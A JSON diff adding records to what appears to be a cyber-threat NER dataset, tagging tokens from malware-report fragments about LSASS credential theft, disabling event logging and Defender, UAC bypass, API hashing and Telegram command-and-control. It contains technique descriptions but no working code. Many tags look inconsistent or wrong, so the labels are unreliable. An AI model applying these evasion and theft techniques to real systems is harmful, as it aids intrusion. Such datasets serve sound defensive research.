"the", + "getHashFlsa64.dll", + "credential", + "theft", + "component." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "accesses", + "the", + "memory", + "of", + "its", + "host", + "LSASS", + "process", + "and", + "stores", + "stolen", + "credentials", + "in", + "a", + "Mimikatz", + "log", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "of", + "a", + "Security", + "Package", + "into", + "LSASS", + "using", + "RPC", + "calls." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "steals", + "credentials", + "from", + "LSASS" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "used", + "C:\\MS_DATA", + "as", + "their", + "main", + "working", + "directory", + "for", + "storing", + "malware", + "and", + "staging", + "data", + "for", + "exfiltration" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "Remote", + "Desktop", + "user", + "sessions." + ], + "ner_tags": [ + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd\"", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "cmd\"", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "cmd\"", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "They", + "also", + "retrieve", + "networking", + "information,", + "like", + "network", + "adapters,", + "specific", + "machines,", + "and", + "network", + "services", + "like", + "Remote", + "Desktop", + "Protocol", + "(RDP)." + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "For", + "lateral", + "movement,", + "the", + "attackers", + "made", + "use", + "of", + "the", + "PsExec", + "tool", + "and", + "the", + "net", + "use", + "command", + "for", + "accessing", + "shared", + "resources", + "on", + "remote", + "machines." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "the", + "PsExec", + "Windows", + "Sysinternals", + "tool", + "and", + "net", + "for", + "lateral", + "movement", + "and", + "exploration" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "loads", + "and", + "executes", + "the", + "decrypted" + ], + "ner_tags": [ + "B-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "pc.exe", + "decrypts", + "AddSecurityPackage64.dll", + "and", + "pc.dll", + "using", + "the", + "AES", + "encryption", + "algorithm" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "pc.dll", + "decrypts," + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Disabling", + "Windows", + "event", + "logging", + "in", + "an", + "attempt", + "to", + "evade", + "detection" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "an", + "attempt", + "to", + "remain", + "undetected,", + "AddSecurityPackage64.dll", + "disables", + "Windows", + "event", + "logging", + "by", + "killing", + "threads", + "of", + "the", + "Windows", + "Event", + "Log", + "service", + "without", + "stopping", + "the", + "execution", + "of", + "the", + "service", + "itself" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Injecting", + "pc.dll", + "into", + "LSASS", + "as", + "a", + "Security", + "Package" + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "execute", + "malicious", + "code", + "in", + "the", + "context", + "of", + "LSASS." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "enumerating", + "the", + "processes’", + "threads," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "tasklist" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "informationAddSecurityPackage64.dll", + "injects", + "pc.dll", + "into", + "LSASS", + "by", + "deploying", + "pc.dll", + "as", + "a", + "Security", + "Package" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "embedded", + "JavaScript", + "Observed", + "Notation", + "(JSON)-based", + "configuration", + "to", + "set", + "parameters" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "text-encoded", + "in", + "base64" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "brute-force", + "attacks" + ], + "ner_tags": [ + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "brute-forcing", + "and", + "compromising", + "servers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valid", + "credentials" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "uploaded", + "to", + "the", + "command-and-control", + "(C&C)", + "server," + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "usually", + "at", + "port", + "5028/TCP" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "several", + "highly", + "obfuscated", + "and", + "underdevelopment", + "custom", + "loaders" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "malicious", + "RAR", + "archive" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exploits", + "CVE-2015-2291,", + "an", + "Intel", + "driver", + "vulnerability,", + "to", + "load", + "a", + "malicious", + "driver", + "designed", + "to", + "reduce", + "the", + "token", + "integrity", + "of", + "Microsoft", + "Defender." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deploying", + "a", + "malicious", + "kernel", + "mode", + "driver", + "(“bring", + "your", + "own", + "vulnerable", + "driver”", + "or", + "BYOVD", + "method)", + "via", + "exploiting", + "a", + "vulnerable", + "Intel", + "driver" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "install", + "an", + "information", + "stealer." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stealer," + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "keylogger", + "with", + "logging", + "capabilities", + "using", + "the", + "Telegram", + "API" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "distributed", + "to", + "victims", + "via", + "phishing", + "attempts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "embedded", + "binary", + "files" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "archive", + "contains", + "the", + "files," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deobfuscate,", + "decompress," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "strings" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "deobfuscation,", + "and", + "decompression" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decompressing" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "decompresses", + "it", + "using", + "the", + "GZipStream", + "API," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "masquerades", + "as", + "a", + "legitimate", + "word", + "document" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "legitimize", + "the", + "package", + "in", + "the", + "eyes", + "of", + "the", + "victim" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "designed", + "to", + "lure", + "unsuspecting", + "victims", + "into", + "executing", + "the", + "loader." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "executed", + "by", + "the", + "victim" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "utilizes", + "Telegram", + "for", + "delivering", + "payloads" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "used", + "to", + "send", + "program", + "execution", + "DEBUG", + "and", + "Telegram", + "to", + "deliver", + "payloads", + "and", + "send", + "commands." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "the", + "next", + "part" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "utilizes", + "Telegram", + "for", + "delivering", + "payloads,", + "sending", + "commands,", + "and", + "receiving", + "the", + "payload", + "heartbeat." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "send", + "commands." + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "a", + "request", + "to", + "the", + "attacker-controlled", + "Telegram", + "channel" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "the", + "message", + "\"bot", + "getted\"", + "to", + "the", + "debug", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "accepts", + "commands", + "from", + "a", + "Telegram", + "channel," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "message", + "to", + "both", + "the", + "Debug", + "server", + "and", + "the", + "Telegram", + "channel," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "a", + "GET", + "request", + "to", + "https://api[.]telegram[.]org/bot{token}/getUpdates", + "to", + "retrieve", + "the", + "command" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "API", + "hashing" + ], + "ner_tags": [ + "B-SecTeam", + "B-SecTeam" + ] + }, + { + "tokens": [ + "resolves", + "hashed", + "Windows", + "APIs" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "conceal", + "the", + "utilization", + "of", + "potentially", + "suspicious", + "APIs", + "(functions)", + "from", + "static", + "detection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "replacing", + "the", + "human-readable", + "names", + "of", + "functions", + "(such", + "as", + "\"CreateMutexW\")", + "with", + "a", + "hash", + "value," + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "in", + "the", + "code", + "to", + "call", + "the", + "corresponding", + "API", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "employs", + "dynamic", + "API", + "resolving", + "to", + "conceal", + "its", + "API", + "imports" + ], + "ner_tags": [ + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "storing", + "the", + "names", + "or", + "hashes", + "of", + "the", + "APIs", + "needed,", + "then", + "importing", + "them", + "dynamically", + "at", + "runtime." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "passes", + "two", + "arguments", + "to", + "the", + "\"mw_resolveAPI\"", + "function." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "resolves", + "the", + "given", + "API", + "hash", + "and", + "retrieves", + "the", + "address", + "of", + "an", + "exported", + "function" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creating", + "a", + "hash", + "for", + "each", + "export", + "function", + "name" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "string", + "encryption," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "irrelevant", + "code" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "LoadLibrary", + "and", + "GetProcAddress", + "functions" + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Compressapi" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "GetTokenInformation", + "API." + ], + "ner_tags": [ + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "retrieves", + "the", + "MachineGuid", + "of", + "the", + "infected", + "system", + "from", + "the", + "SOFTWARE\\Microsoft\\Cryptography\\MachineGuid", + "registry", + "key" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "retrieves", + "the", + "MachineGuid", + "of", + "the", + "infected", + "system", + "from", + "the", + "\"SOFTWARE\\Microsoft\\Cryptography\\MachineGuid\"", + "registry", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "deletes", + "the", + "HKCU\\SOFTWARE\\Intel", + "registry", + "key", + "and", + "recreates", + "it" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collects", + "information", + "about", + "the", + ".NET", + "Framework", + "Setup" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "elevate", + "its", + "privileges", + "by", + "executing", + "the", + "mw_UAC_bypass", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Calling", + "Local", + "Windows", + "RPC", + "Servers", + "from", + ".NET" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "bypass", + "user", + "account", + "control", + "(UAC)", + "using", + "only", + "two", + "remote", + "procedure", + "call", + "(RPC)", + "requests" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "executes", + "an", + "export", + "function", + "called", + "\"Entry\"", + "from", + "UpdateTask.dll", + "via", + "rundll32.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "payload", + "through", + "rundll32.exe" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "disable", + "Microsoft", + "Defender" + ], + "ner_tags": [ + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "patch", + "the", + "integrity", + "level", + "of", + "the", + "Microsoft", + "defender", + "(MsMpEng.exe)", + "and", + "forcibly", + "reduce", + "it", + "from", + "system", + "to", + "untrusted", + "integrity." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "determine", + "if", + "it", + "is", + "running", + "as", + "an", + "account", + "with", + "administrator", + "privileges", + "or", + "simply", + "as", + "a", + "regular", + "user" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creating", + "scheduled", + "tasks" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sets", + "up", + "its", + "working", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collect", + "system", + "information", + "and", + "steals", + "user", + "information" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "tokens,", + "and", + "passwords", + "from", + "various", + "web", + "browsers", + "and", + "applications" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "captures", + "screenshots" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "compressed", + "and", + "exfiltrated", + "to", + "the", + "attacker", + "via", + "Telegram" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "some", + "strings,", + "such", + "as", + "web", + "browser", + "paths", + "and", + "Geolocation", + "API", + "services", + "URLs,", + "are", + "encrypted", + "with", + "the", + "AES", + "algorithm", + "in", + "cipher-block", + "chaining", + "(CBC)", + "mode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gathers", + "basic", + "system", + "information," + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "for", + "the", + "infected", + "system", + "by", + "gathering", + "the", + "username", + "and", + "hostname" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "then", + "proceeds", + "to", + "gather", + "basic", + "system", + "information,", + "including", + "username,", + "computer", + "name,", + "and", + "OS", + "version," + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "System", + "info,", + "including", + "both", + "hardware", + "and", + "OS", + "info." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Collection", + "of", + "information", + "about", + "the", + "system", + "in", + "HTML", + "format" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "and", + "hostname" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "gathers", + "basic", + "system", + "information,", + "which", + "it", + "then", + "sends", + "to", + "the", + "C2," + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "send", + "a", + "list", + "of", + "process", + "names", + "and", + "IDs", + "back", + "to", + "the", + "C2" + ], + "ner_tags": [ + "B-Way", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "system", + "information", + "gathered", + "by", + "Domino", + "Backdoor", + "and", + "sent", + "to", + "the", + "C2" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "in", + "return", + "receives", + "an", + "AES", + "encrypted", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "a", + "custom", + "algorithm", + "which", + "XOR’s", + "multiple", + "values", + "together." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "is", + "stored", + "immediately", + "before", + "the", + "encrypted", + "config", + "block." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "generates", + "a", + "random", + "32-byte", + "key,", + "which", + "it", + "encrypts", + "using", + "the", + "RSA", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "loading", + "an", + "encrypted", + "payload", + "from", + "its", + "resources" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Microsoft", + "WinCrypt", + "library", + "is", + "used", + "for", + "AES", + "encryption", + "and" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "the", + "encrypted", + "config." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "be", + "based", + "on", + "an", + "encryption", + "algorithm", + "used", + "previously", + "in" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "gathering", + "the", + "username", + "and" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "gather", + "basic", + "system", + "information,", + "including", + "username," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "generated", + "from", + "the", + "system", + "username" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "a", + "similar", + "XOR-based", + "algorithm", + "as", + "part", + "of", + "its", + "encryption", + "mechanisms", + "during", + "communication", + "with", + "the", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "proceeds", + "to", + "gather", + "basic", + "system", + "information,", + "including", + "username,", + "computer", + "name,", + "and", + "OS", + "version,", + "which", + "it", + "then", + "encrypts", + "using", + "AES-256-CBC", + "and", + "the", + "generated," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "sends", + "the", + "AES-encrypted", + "system", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "data", + "is", + "then", + "encrypted", + "using", + "AES", + "and", + "returned", + "to", + "the", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decrypted", + "config", + "contains", + "two", + "pipe-delimited", + "IP", + "addresses" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "decrypts", + "them", + "using", + "XOR", + "and", + "the", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "then", + "proceeds", + "to", + "decrypt", + "its", + "configuration", + "block," + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "The", + "config", + "is", + "decrypted", + "using", + "XOR", + "and", + "a", + "16-byte", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "second", + "config", + "block,", + "which", + "is", + "decrypted", + "separately" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decrypted", + "data", + "consists", + "of", + "a", + "4", + "byte", + "size" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "then", + "decrypts", + "the", + "received", + "payload", + "using", + "AES", + "and", + "the", + "shared", + "key." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "decrypts", + "to", + "the", + "following", + "5", + "bytes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting", + "it", + "using", + "AES-256-CBC", + "and", + "a", + "hardcoded", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decrypted", + "data", + "consists", + "of", + "4", + "bytes", + "containing", + "the", + "payload", + "size," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "The", + "Microsoft", + "WinCrypt", + "library", + "is", + "used", + "for", + "AES", + "encryption", + "and", + "decryption", + "by", + "both" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "decrypted", + "using", + "XOR", + "and", + "a", + "16-byte", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "the", + "decrypted", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "loads", + "the", + "resources", + "using", + "the", + "API", + "calls", + "LdrFindResource_U", + "and", + "LdrAccessResource" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "and", + "execute", + "the", + "file", + "using", + "CreateProcessA." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "utilising", + "similar", + "API", + "calls," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "enumerates", + 